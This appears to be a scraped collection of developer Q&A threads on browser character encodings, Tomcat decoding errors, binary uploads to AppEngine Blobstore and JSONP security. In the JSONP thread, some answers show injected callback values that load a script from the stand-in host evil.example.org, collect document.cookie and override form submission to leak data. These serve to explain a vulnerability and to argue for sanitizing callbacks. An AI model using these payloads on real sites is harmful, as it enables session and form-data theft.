ANSI vs UTF-8 in web Browser

ANSI vs UTF-8 in web Browser - javascript

My requirement is to allow users to use(type) ANSI characters instead of utf-8 when they are typing in to the text fields of my webpages.
I looked at the setting of the character set in html meta tag
<meta charset="ISO-8859-1">
That was helpful to display the content in ANSI instead of UTF-8, but it does not stop users typing in utf-8. Any help is appreciated.

Let's distinguish between two things here: characters the user can type and the encoding used to send this data to the server. These are two separate issues.
A user can type anything they want into a form in their browser. For all intents and purposes these characters have no encoding at this point, they're pure "text"; encodings do not play a role just yet and you cannot restrict the set of available characters with encodings.
Once the user submits the form, the browser will have to encode this data into binary somehow, which is where an encoding comes in. Ultimately the browser decides how to encode the data, but it will choose the encoding specified in the HTTP headers, meta elements and/or accept-charset attribute of the form. The latter should always by the deciding factor, but you'll find buggy behaviour in the real world (*cough*cough*IE*cough*). In practice, all three character set definitions should be identical to not cause any confusion there.
Now, if your user typed in some "exotic" characters and the browser has decided to encode the data in "ANSI" and the chosen encoding cannot represent those exotic characters, then the browser will typically replace those characters with HTML entities. So, even in this case it doesn't restrict the allowed characters, it simply finds a different way to encode them.
How can I know what encoding is used by the user
You cannot. You can only specify which character set you would like to receive and then double check that that's actually what you did receive. If the expectation doesn't match, reject the input (an HTTP 400 Bad Request response may be in order).
If you want to limit the acceptable set of characters a user may input, you need to do this by checking and rejecting characters independent of their encoding. You can do this in Javascript at input time, and will ultimately need to do this on the server again (since browser-side Javascript ultimately has no influence on what can get submitted to the server).

If you set the encoding of the page to UTF-8 in a and/or HTTP header, it will be interpreted as UTF-8, unless the user deliberately goes to the View->Encoding menu and selects a different encoding, overriding the one you specified.
In that case, accept-encoding would have the effect of setting the submission encoding back to UTF-8 in the face of the user messing about with the page encoding. However, this still won't work in IE, due the previous problems discussed with accept-encoding in that browser.
So it's IMO doubtful whether it's worth including accept-charset to fix the case where a non-IE user has deliberately sabotaged the page encoding

Related

TOMCAT reporting this error: INFO: Character decoding failed

I have a WEB application consisting of a client (mainly AngularJS, JQuery and Bootstrap), a Servlet (TOMCAT) and a database (MySQL).
The user can enter text in a number of places (sort of free-text form). The client prepares a JSON and sends it towards the servlet who forwards to the DB, and a response JSON is returned all the way towards the client.
I found a mishandling (causing a "Character decoding failure" in the servlet) when special characters are included in the text. Specifically, I copied from MS-Word the text and pasted it into the input fields and the string included some characters that MS-Word automatically replaces (e.g. simple quote sign to a titled one - if you just type "I don't know" the ' is replaced by ’) causing the error.
I tried removing control characters using myString=myString.replace(/[\x00-\x1F\x7F-\x9F]/g, "") but with no success.
Could anyone suggest what is the standard practice to properly handle this condition?
Thanks!!!
EDIT:
Here are the lines where the error is being reported (the JSON is quite large, so I'm only showing the relevant sections):
Jul 30, 2016 11:56:29 AM org.apache.tomcat.util.http.Parameters processParameters
INFO: Character decoding failed. Parameter [request] with value [{...,"Text":"I donֳ¢ֲ€ֲ™t know"..."I donֳ¢ֲ€ֲ™t know"...}] has been ignored. Note that the name and value quoted here may be corrupted due to the failed decoding. Use debug level logging to see the original, non-corrupted values.
Note: further occurrences of Parameter errors will be logged at DEBUG level.

Try to change the encoding of your Tomcat. You can find it in conf/server.xml, the line like this:
<Connector port="8080" URIEncoding="UTF-8"/>

POST data will always be transmitted to the server using UTF-8 charset

POST data will always be transmitted to the server using UTF-8 charset. -jQuery.ajax docs
Does this happen only when you use POST with jQuery (jQuery.post) or using <form method=post>?

Content encoding of a form post is consistent with the declared document encoding. For example:
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
When a form is submitted, the default encoding is form-url-encoded.
An XHR request can override the setting:
xhr.setRequestHeader('Content-Type','text/xml; charset=utf-8;');
So to answer your question, it is possible to have a form submission in iso-8859-1, and yet the Ajax call uses utf-8. Please avoid such situation, or your server side code will get messy.

Short answer
In HTML, the charset can be set by setting the accept-charset attribute on the form. If not set or the given values are not valid, the user agent defaults to the document's charset then to UTF-8. jQuery does it via setting the Content-Type header on the request.
Longer answer w/ sources
All HTML forms may have the attribute accept-charset which, as the HTML spec says:
The accept-charset attribute gives the character encodings that are to
be used for the submission. If specified, the value must be an ordered
set of unique space-separated tokens that are ASCII case-insensitive,
and each token must be an ASCII case-insensitive match for one of the
labels of an ASCII-compatible character encoding.
Source, two paragraphs below the big blue thingy.
You may also be interested in §4.10.22.5 Selecting a form submission encoding, emphasis mine:
If the user agent is to pick an encoding for a form, optionally with
an allow non-ASCII-compatible encodings flag set, it must run the
following substeps:
Let input be the value of the form element's accept-charset attribute.
Let candidate encoding labels be the result of splitting input on
spaces.
Let candidate encodings be an empty list of character encodings.
For each token in candidate encoding labels in turn (in the order in
which they were found in input), get an encoding for the token and, if
this does not result in failure, append the encoding to candidate
encodings.
If the allow non-ASCII-compatible encodings flag is not set, remove
any encodings that are not ASCII-compatible character encodings from
candidate encodings.
If candidate encodings is empty, return UTF-8 and abort these steps.
Each character encoding in candidate encodings can represent a finite
number of characters. (For example, UTF-8 can represent all 1.1
million or so Unicode code points, while Windows-1252 can only
represent 256.)
For each encoding in candidate encodings, determine how many of the
characters in the names and values of the entries in the form data set
the encoding can represent (without ignoring duplicates). Let max be
the highest such count. (For UTF-8, max would equal the number of
characters in the names and values of the entries in the form data
set.)
Return the first encoding in candidate encodings that can encode max
characters in the names and values of the entries in the form data
set.
Source

Upload binary data to AppEngine Blobstore via HTTP request

I'm trying to figure out the lowest data-overhead way to upload/download binary data to Google AppEngine's Blobstore from a JavaScript initiated HTTP request. Ideally, I would like to submit the binary data directly, i.e. as unencoded 8-bit values; maybe in a POST request that looks something like this:
...
Content-Type: multipart/form-data; boundary=boundary;
--boundary
Content-Disposition: form-data; name="a"; filename="b"
Content-Type: application/octet-stream
##^%(^Qtr...
--boundary--
Here, ##^%(^Qtr... ideally represents arbitrary 8-bit binary data.
Specifically, I am trying to understand the following:
Is it possible to directly upload 8-bit binary data, or would I need to encode the data somehow, like a base-64 MIME encoding?
If I use a different encoding, would Blobstore save the data as 8-bit binary internally or in the encoded format? I.e. would a base-64 encoding increase my storage cost by 33%?
Along the same lines: Does encoding overhead increase outgoing bandwidth cost?
Is there a better way to format the POST request so I don't need to come up with a boundary that doesn't appear in my binary data? E.g. is there a way to specify a Content-Length rather than a boundary?
In the GET request to retrieve the data, can I simply expect to have binary data end up in the return string, or is the server going to automatically encode the data somehow?
If I need to use some encoding, which one would be the best choice among the supported options for essentially random 8-bit data? (base-64, UTF-8, someting else?)

Even though I received the Tumbleweed Badge for this question, let me report on my progress anyways in case somebody out there does care:
This question turned out to pose 3 independent problems:
Uploading data to BlobStore efficiently
Making sure BlobStore saves it in the smallest possible format
Finding a way to reliably download the data
Let's start with (3), because this ends up posing the biggest issue:
So far I have not been able to find a way to download true 8-bit data to the browser via XHR. Using mime-types like application/octet-stream leads to only 7 bits reaching the client reliably, unless the data is downloaded to a file. The best solution I found, is using the following mime-type for the data:
text/plain; charset=ISO-8859-1
This seems to be supported in all browsers that I've tested: IE 8, Chrome 21, FF 12.0, Opera 11.61, Safari 5.1.2 under Windows, and Android 2.3.3.
With this, it is possible to transfer almost any 8-bit value, with the following restrictions/caveats:
Character 0x00 is interpreted as the end of the input string in IE8 and must therefore be avoided.
Most browsers interpret charset ISO-8859-1 as Windows-1252 instead, leading to characters 0x80 through 0x9F being changed accordingly. This can be fixed, though, as the changes are unambiguous. (see http://en.wikipedia.org/wiki/Windows-1252#Codepage_layout)
Characters 0x81, 0x8D, 0x8F, 0x90, 0x9D are reserved in the Windows-1252 charset and Opera returns an error code for these, therefore these need to be avoided as well.
Overall, this leaves us with 250 out of the 256 characters which we can use. With the required basis-change for the data, this means an outgoing-data-overhead of under 0.5%, which I guess I'm ok with.
So, now to problem (1) and (2):
As incoming bandwidth is free, I've decided to reduce the priority of solving problem (1) in favor of problems (2) and (3). Turns out, using the following POST request does the trick then:
...
Content-Type: multipart/form-data; boundary=-
---
Content-Disposition: form-data; name="a"; filename="b"
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: base64
abcd==
-----
Here, abcd== is the base64-MIME-encoded data consisting of the above described 250 allowed characters (see http://en.wikipedia.org/wiki/Base64#Examples, GAE uses + and / as the last 2 characters). The encoding is necessary (correct me if I'm wrong) as calling the XHR send() function with String data will result in UTF-8 encoding of the string, which screws up the data received by the server. Unfortunately passing ArrayBuffers and Blobs to the send() function isn't available in all browsers yet to circumvent this issue more elegantly.
Now the good news: The AppEngine BlobStore decodes this data automatically and correctly and stores it without overhead! Therefore, using the base64-encoding only leads to slower data-uploads from the client, but does not result in additional hosting cost (unless maybe a couple CPU cycles for the decoding).
Aside: The AppEngine development-server will report the encoded size (i.e. 33% larger) for the stored blob, both in the admin console and in a retrieved BlobInfo record. The production servers do not have this issue, though, and report the correct blob size.
Conclusion:
Using Content-Transfer-Encoding base64 for uploading binary data of Content-Type text/plain; charset=ISO-8859-1, which may not contain characters 0x00, 0x81, 0x8D, 0x8F, 0x90, and 0x9D, leads to reliable data transfer for many tested browsers with a storage/outgoing-bandwidth overhead of less than half a percent. The upload-overhead of the base64-encoded data is 33%, which is better than the expected 50% for UTF-8 (for random 8-bit data), but still far from desirable.
What I don't know is: Is this the optimal solution, or could one do better? Anyone up for the challenge?

Apparent jsonp xss vulnerability

Some of our customers have chimed in about a perceived XSS vulnerability in all of our JSONP endpoints, but I disagree as to whether or not it actually constitutes a vulnerability. Wanted to get the community's opinion to make sure I'm not missing something.
So, as with any jsonp system, we have an endpoint like:
http://foo.com/jsonp?cb=callback123
where the value of the cb parameter is replayed back in the response:
callback123({"foo":"bar"});
Customers have complained that we don't filter out HTML in the CB parameter, so they'll contrive an example like so:
http://foo.com/jsonp?cb=<body onload="alert('h4x0rd');"/><!--
Obviously for a URL that returns the content type of text/html, this poses a problem wherein the browser renders that HTML and then executes the potentially malicious javascript in the onload handler. Could be used to steal cookies and submit them to the attacker's site, or even to generate a fake login screen for phishing. User checks the domain and sees that it's one he trusts, so he goes agead and logs in.
But, in our case, we're setting the content type header to application/javascript which causes various different behaviors in different browsers. i.e. Firefox just displays the raw text, whereas IE opens up a "save as..." dialog. I don't consider either of those to be particularly exploitable. The Firefox user isn't going to read malicious text telling him to jump off a bridge and think much of it. And the IE user is probably going to be confused by the save as dialog and hit cancel.
I guess I could see a case where the IE user is tricked into saving and opening the .js file, which then goes through the microsoft JScript engine and gets all sorts of access to the user's machine; but that seems unlikely. Is that the biggest threat here or is there some other vulnerability that I missed?
(Obviously I'm going to "fix" by putting in filtering to only accept a valid javascript identifier, with some length limit just-in-case; but I just wanted a dialog about what other threats I might have missed.)

Their injection would have to be something like </script><h1>pwned</h1>
It would be relatively trivial for you to verify that $_GET['callback'] (assuming PHP) is a valid JavaScript function name.
The whole point of JSONP is getting around browser restrictions that try and prevent XSS-type vulnerabilities, so to some level there needs to be trust between the JSONP provider and the requesting site.
HOWEVER, the vulnerability ONLY appears if the client isn't smartly handling user input - if they hardcode all of their JSONP callback names, then there is no potential for a vulnerability.

Your site would have an XSS vulnerability if the name of that callback (the value of "cb") were derived blindly from some other previously-input value. The fact that a user can create a URL manually that sends JavaScript through your JSONP API and back again is no more interesting than the fact that they can run that same JavaScript directly through the browser's JavaScript console.
Now, if your site were to ship back some JSON content to that callback which used unfiltered user input from the form, or more insidiously from some other form that previously stored something in your database, then you'd have a problem. Like, if you had a "Comments" field in your response:
callback123({ "restaurantName": "Dirty Pete's Burgers", "comment": "x"+alert("haxored")+"y" })
then that comment, whose value was x"+alert("haxored")+"y, would be an XSS attack. However any good JSON encoder would fix that by quoting the double-quote characters.
That said, there'd be no harm in ensuring that the callback name is a valid JavaScript identifier. There's really not much else you can do anyway, since by definition your public JSONP service, in order to work properly, is supposed to do whatever the client page wants it to do.

Another example would be making two requests like these:
https://example.org/api.php
?callback=$.getScript('//evil.example.org/x.js');var dontcare=(
which would call:
$.getScript('//evil.example.org/x.js');var dontcare= ({ ... });
And evil.example.org/x.js would request:
https://example.org/api.php
?callback=new Mothership({cookie:document.cookie, loc: window.location, apidata:
which would call:
new Mothership({cookie:document.cookie, loc: window.location, apidata: { .. });
Possibilities are endless.
See Do I need to sanitize the callback parameter from a JSONP call? for an example of sanitizing a JSON callback.
Note: Internet Explorer tends to ignore the Content-Type header by default. It is stubborn, and goes to look at the first few bytes of the HTTP response directly, and if it looks kinda of HTML, it will proceed to parse and execute it all as text/html, including inline scripts.

There's nothing to stop them from doing something that inserts code, if that is the case.
Imagine a URL such as http://example.com/jsonp?cb=HTMLFormElement.prototype.submit = function() { /* send form data to some third-party server */ };foo. When this gets received by the client, depending on how you handle JSONP, you may introduce the ability to run JS of arbitrary complexity.
As for how this is an attack vector: imagine an HTTP proxy, that is a transparent forwarding proxy for all URLs except http://example.com/jsonp, where it takes the cb part of the query string and prepends some malicious JS before it, and redirects to that URL.

As Pointy indicates, solely calling the URL directly is not exploitable. However, if any of your own javascript code makes calls to the JSON service with user-supplied data and either renders the values in the response to the document, or eval()s the response (whether now, or sometime in the future as your app evolves over time) then you have a genuinely exploitable XSS vulnerability.
Personally I would still consider this a low risk vulnerability, even though it may not be exploitable today. Why not address it now and remove the risk of it being partly responsible for introducing a higher-risk vulnerability at some point in the future?

Greasemonkey communication with server that requires windows-1250 encoding

I'm developing a greasemonkey plugin, which is supposed to send a form in background using POST (GM_xmlhttpRequest) on an application not under my control. That application is written in PHP and seems to expect all its input in windows-1250 encoding. What I need to do is to take all the form fields as they are, edit just one of them and resubmit. Some of the fields use accented characters and are limited in length.
Not a problem in theory - I iterate over all form fields, use the encodeURIComponent function on the values and concatenate everything to a post request body. HOWEVER. The encodeURIComponent function always encodes characters according to UTF-8, which leads to all sorts of problems. Because PHP doesn't seem to recode my request to windows-1250 properly, it misinterprets multibyte strings and comes to the conclusion that the resubmitted values are longer than the allowed 40 characters and dies on me. Or the script just dies silently without giving me any sort of useful feedback.
I have tested this by looking at the POST body firefox is sending when I submit the form in a browser window and then resending the same data to the server using xhr. Which worked. For example the string:
Zajišťujeme profesionální modelky
Looks as follows, when encoded by encodeURIComponent:
Zaji%C5%A1%C5%A5ujeme%20profesion%C3%A1ln%C3%AD%20modelky
Same thing using urlencode in PHP (source text in windows-1250) or Firefox:
Zaji%9A%9Dujeme+profesion%E1ln%ED+modelky
Apparently, I need to encode the post body as if it were in windows-1250 or somehow make the server accept utf-8 (which I doubt is possible). I tried all kinds of other function like escape or encodeURI, but the output is not much different - all seem to output in utf-8.
Is there any way out of this?

Another way to get Firefox to encode a URL is to set it as the href of a link. The property (NOT attribute) will always read back as an absolute link urlencoded in the page's encoding.
For a GET request you would simply set the href as http://server/cgi?var=value and read back the encoded form. For a POST request you would have to take the extra step to separate the data (you can't use ?var=value on its own because the link reads back as an absolute link).

Let the browser encode the form. Put it in a hidden iframe and call submit() on it.

We Keep Coding

JavaScript is the programming language of the Web.